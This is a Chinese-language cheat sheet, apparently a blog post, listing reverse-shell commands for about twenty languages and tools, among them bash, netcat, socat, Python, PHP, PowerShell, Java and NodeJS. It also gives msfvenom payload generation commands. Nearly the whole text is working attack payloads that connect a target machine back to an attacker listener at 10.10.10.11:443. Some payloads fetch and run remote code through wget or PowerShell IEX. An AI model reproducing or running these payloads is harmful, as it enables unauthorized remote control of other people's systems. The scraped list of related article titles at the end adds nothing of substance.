假设本机地址10.10.10.11,监听端口443。

1、Bash环境下反弹TCP协议shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

bash -i >& /dev/tcp/10.10.10.11/443 0>&1

/bin/bash -i > /dev/tcp/10.10.10.11/443 0&1

exec 5<>/dev/tcp/10.10.10.11/443;cat &5 >&5; done

exec /bin/sh 0&0 2>&0

0/dev/tcp/10.10.10.11/443; sh &196 2>&196

2、Bash环境下反弹UDP协议shell:

首先在本地监听UDP协议443端口

nc -u -lvp 443

然后在靶机上执行如下命令:

sh -i >& /dev/udp/10.10.10.11/443 0>&1

3、使用Netcat反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

nc -e /bin/sh 10.10.10.11 443

nc -e /bin/bash 10.10.10.11 443

nc -c bash 10.10.10.11 443

mknod backpipe p && nc 10.10.10.11 443 0backpipe

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.11 443 >/tmp/f

rm -f /tmp/p; mknod /tmp/p p && nc 10.10.10.11 443 0/tmp/p 2>&1

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.10.10.11 443 > f

rm -f x; mknod x p && nc 10.10.10.11 443 0x

4、使用Ncat反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

ncat 10.10.10.11 443 -e /bin/bash

ncat –udp 10.10.10.11 443 -e /bin/bash

5、利用Telnet反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.11 443 0/tmp/p 2>&1

telnet 10.10.10.11 443 | /bin/bash | telnet 10.10.10.11 444

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.10.11 443 > f

rm -f x; mknod x p && telnet 10.10.10.11 443 0x

6、使用Socat反弹shell

首先在本地监听TCP协议443端口

socat file:`tty`,raw,echo=0 TCP-L:443

然后在靶机上执行如下命令:

/tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:10.10.10.11:443

socat tcp-connect:10.10.10.11:443 exec:”bash -li”,pty,stderr,setsid,sigint,sane

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:10.10.10.11:443

7、利用Perl脚本反弹

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

perl -e ‘use Socket;$i=”10.10.10.11″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”10.10.10.11:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

win平台下执行:

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”10.10.10.11:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

8、利用Python脚本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

IPv4协议如下:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.11”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

export RHOST=”10.10.10.11″;export RPORT=443;python -c ‘import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(“/bin/sh”)’

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.11”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

IPv6协议如下:

python -c ‘import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((“dead:beef:2::125c”,443,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(“/bin/sh”);’

Windows平台如下:

C:\Python27\python.exe -c “(lambda __y, __g, __contextlib: [[[[[[[(s.connect((‘10.10.10.11’, 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(‘except’, (), {‘__enter__’: lambda self: None, ‘__exit__’: lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type(‘try’, (), {‘__enter__’: lambda self: None, ‘__exit__’: lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[‘p2s_thread’] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[‘s2p_thread’] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g[‘p’] in [(subprocess.Popen([‘\\windows\\system32\\cmd.exe’], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g[‘s’] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[‘p2s’], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[‘s’].send(__l[‘p’].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[‘s’], __l[‘p’] in [(s, p)]][0])({}), ‘p2s’)]][0] for __g[‘s2p’], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[‘p’].stdin.write(__l[‘data’]), __after())[1] if (len(__l[‘data’]) > 0) else __after())(lambda: __this()) for __l[‘data’] in [(__l[‘s’].recv(1024))]][0] if True else __after())())(lambda: None) for __l[‘s’], __l[‘p’] in [(s, p)]][0])({}), ‘s2p’)]][0] for __g[‘os’] in [(__import__(‘os’, __g, __g))]][0] for __g[‘socket’] in [(__import__(‘socket’, __g, __g))]][0] for __g[‘subprocess’] in [(__import__(‘subprocess’, __g, __g))]][0] for __g[‘threading’] in [(__import__(‘threading’, __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(‘contextlib’))”

9、利用PHP脚本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

php -r ‘$sock=fsockopen(“10.10.10.11”,443);exec(“/bin/sh -i &3 2>&3”);’

php -r ‘$s=fsockopen(“10.10.10.11”,443);$proc=proc_open(“/bin/sh -i”, array(0=>$s, 1=>$s, 2=>$s),$pipes);’

php -r ‘$s=fsockopen(“10.10.10.11”,443);shell_exec(“/bin/sh -i &3 2>&3”);’

php -r ‘$s=fsockopen(“10.10.10.11”,443);`/bin/sh -i &3 2>&3`;’

php -r ‘$s=fsockopen(“10.10.10.11”,443);system(“/bin/sh -i &3 2>&3”);’

php -r ‘$s=fsockopen(“10.10.10.11”,443);popen(“/bin/sh -i &3 2>&3”, “r”);’

php -r ‘$s=\’127.0.0.1\’;$p=443;@error_reporting(0);@ini_set(“error_log”,NULL);@ini_set(“log_errors”,0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open(\’/bin/sh$IFS-i\’,array(array(\’pipe\’,\’r\’),array(\’pipe\’,\’w\’),array(\’pipe\’,\’w\’)),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die(\’connection/closed\’);if(feof($p[1]))die(\’shell/not/response\’);$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die(“proc_open/disabled”);}}else{die(“not/connect”);}’

10、利用Ruby脚本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

ruby -rsocket -e’f=TCPSocket.open(“10.10.10.11”,443).to_i;exec sprintf(“/bin/sh -i &%d 2>&%d”,f,f,f)’

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“10.10.10.11″,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

Windows平台如下:

ruby -rsocket -e ‘c=TCPSocket.new(“10.10.10.11″,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

11、使用OpenSSL反弹shell

首先在本地监听TCP协议443端口

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

openssl s_server -quiet -key key.pem -cert cert.pem -port 443

ncat –ssl -vv -l -p 443

然后在靶机上执行如下命令:

mkfifo /tmp/s; /bin/sh -i &1 | openssl s_client -quiet -connect 10.10.10.11:443 > /tmp/s; rm /tmp/s

12、win平台下使用Powershell反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(“10.10.10.11”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.10.10.11’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1’)

13、利用Awk反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

awk ‘BEGIN {s = “/inet/tcp/0/10.10.10.11/443”; while(42) { do{ printf “shell>” |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != “exit”) close(s); }}’ /dev/null

14、TCL脚本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

echo ‘set s [socket 10.10.10.11 443];while 42 { puts -nonewline $s “shell>”;flush $s;gets $s c;set e “exec $c”;if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;’ | tclsh

15、Java版本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

linux平台:

r = Runtime.getRuntime()

p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.10.10.11/443;cat &5 >&5; done”] as String[])

p.waitFor()

windows平台:

String host=”127.0.0.1″;

int port=4444;

String cmd=”cmd.exe”;

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

创建线程:

Thread thread = new Thread(){

public void run(){

// Reverse shell here

}

}

thread.start();

16、生成War文件反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

使用如下命令生成war文件:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f war > reverse.war

查看war包中shell的jsp文件名

strings reverse.war | grep jsp

在靶机上部署war包后,访问shell的jsp文件,即可在监听端口获得反弹shell

17、使用Lua脚本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:Linux平台:

lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘10.10.10.11′,’443’);os.execute(‘/bin/sh -i &3 2>&3’);”

Windows及Linux平台:

lua5.1 -e ‘local host, port = “10.10.10.11”, 443 local socket = require(“socket”) local tcp = socket.tcp() local io = require(“io”) tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, “r”) local s = f:read(“*a”) f:close() tcp:send(s) if status == “closed” then break end end tcp:close()’

18、NodeJS版本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

(function(){

var net = require(“net”),

cp = require(“child_process”),

sh = cp.spawn(“/bin/sh”, []);

var client = new net.Socket();

client.connect(443, “10.10.10.11”, function(){

client.pipe(sh.stdin);

sh.stdout.pipe(client);

sh.stderr.pipe(client);

});

return /a/;

})();

require(‘child_process’).exec(‘nc -e /bin/sh 10.10.10.11 443’)

-var x = global.process.mainModule.require

-x(‘child_process’).exec(‘nc 10.10.10.11 443 -e /bin/bash’)

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

19、Groovy版本反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

String host=”10.10.10.11″;

int port=443;

String cmd=”cmd.exe”;

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

20、生成Meterpreter反弹Shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.11 LPORT=443 -f exe > reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f exe > reverse.exe

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.11 LPORT=443 -f elf >reverse.elf

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f elf >reverse.elf

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f macho > shell.macho

msfvenom -p windows/meterpreter/reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f asp > shell.asp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f raw > shell.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=”10.10.10.11″ LPORT=443 -f war > shell.war

msfvenom -p cmd/unix/reverse_python LHOST=”10.10.10.11″ LPORT=443 -f raw > shell.py

msfvenom -p cmd/unix/reverse_bash LHOST=”10.10.10.11″ LPORT=443 -f raw > shell.sh

msfvenom -p cmd/unix/reverse_perl LHOST=”10.10.10.11″ LPORT=443 -f raw > shell.pl

21、使用Xterm反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

xterm -display 10.10.10.11:1

Xnest :1

xhost +targetip

自动站点:

有些站点也是自动生成类似的内容,自动化生成

https://krober.biz/misc/reverse_shell.php?ip=10.10.10.11&port=443

https://mrxn.net/reverse_shell.php

https://ares-x.com/tools/reverse-shell/

python反弹shell_反弹shell的几种方式总结相关推荐

  1. 简单介绍python连接telnet和ssh的两种方式

    本文主要介绍了python连接telnet和ssh的两种方式,文中通过示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下 Telnet 连接方式 #!/usr/bin/env p ...

  2. python repair修复功能_详解Python修复遥感影像条带的两种方式

    GDAL修复Landsat ETM+影像条带 Landsat7 ETM+卫星影像由于卫星传感器故障,导致此后获取的影像出现了条带.如下图所示, 影像中均匀的布满条带. 使用GDAL修复影像条带的代码如 ...

  3. Python操作Neo4j图数据库的两种方式

    Python操作Neo4j图数据库的两种方式 前言 1. 用neo4j模块执行CQL ( cypher ) 语句 2. 用py2neo模块通过操作python变量,达到操作neo4j的目的 3. 用p ...

  4. Python加载csv文件的两种方式

    本文主要讲解下Python加载csv文件的两种方式,如果知道如何处理的就不必往下看了! 下面来简单介绍下. 实例中的数据集是kaggle的Digit Recognizer的train.csv文件,数据 ...

  5. python 爬虫 数据抓取的三种方式

    python 爬虫   数据抓取的三种方式 常用抽取网页数据的方式有三种:正则表达式.Beautiful Soup.lxml 1.正则表达式 正则表达式有个很大的缺点是难以构造.可读性差.不易适用未来 ...

  6. python 保存csv,Python数据存储到文件的3种方式

    原标题:Python数据存储到文件的3种方式 爬虫请求解析后的数据,需要保存下来,才能进行下一步的处理,一般保存数据的方式有如下几种: 文件:txt.csv.excel.json等,保存数据量小. 关 ...

  7. 编程语言用Python实现九九乘法表的几种方式,入门必备案例!超级简单!

    编程语言用Python实现九九乘法表的几种方式,入门必备案例!超级简单! 我们在学习Python的过程中需要不断的积累和练习,这样才能够走的更远,今天一起来学习怎么用Python写九九乘法表~ 第一种 ...

  8. Python 高等数学应用 求导数的三种方式

    Python 高等数学应用 求导数的三种方式 方式一 使用SymPy的diff 函数, 可以得到函数的导数表达式,给出数学表达式里的数学符号描述符 本例使用了此方法 方式二 使用spicy.misc模 ...

  9. 实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty

    前言 当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念.当我们想使用vim.top等命令时,webshell就无能为力了. 那我们怎么获 ...

最新文章

  1. Maven和Gradle对比
  2. SQL Server2016 原生支持JSON
  3. 利用xposed绕过安卓SSL证书的强校验
  4. 电脑反应慢卡怎么解决_电脑开不了机怎么解决?
  5. SQL基础操作_2_操作多个表
  6. CSS制作简单loading动画
  7. 推荐 | 作为IDEA的死忠粉,这样设置,效果棒棒哒!
  8. goquery php,golang:Goquery简单爬虫实例
  9. python备份文件最简单案例_Python实现备份文件实例
  10. 电商之争:亚马逊与阿里一较高下
  11. 配置文件编辑和历史文件编辑代码
  12. Bitmap Style Designer非官方说明
  13. abp api返回自定义结构体
  14. android自动清理内存不足,安卓手机越用越卡,清理内存也没用?原因其实是这个!...
  15. 桌面计算机图标变黑块,win7桌面图标变成有黑色方块怎么办?4个步骤轻松搞定...
  16. Android-Handler机制简述
  17. python处理图片像素_Python 处理图片像素点的实例
  18. 路飞学城Python-Day78
  19. 详解DAO类(数据库操作对象)
  20. xbox会员中心在哪_白金会会员中心

热门文章

  1. 隶属函数(membership function)
  2. 软件工程OOAD(面向对象的分析与设计)概念整理
  3. OPENMPI并行库安装
  4. sqlsever2019:union合并多个查询结果
  5. 美团(Leaf)分布式ID算法(实战)
  6. 升华系统服务器,爱与被爱感同身受 TOOKY魅力在升华
  7. Android 白学了。。。
  8. python的excel教程_python怎么操作Excel
  9. 各种排序算法的稳定性分析
  10. 用html5写一段文字画布中,超全的HTML5画布(Canvas)实例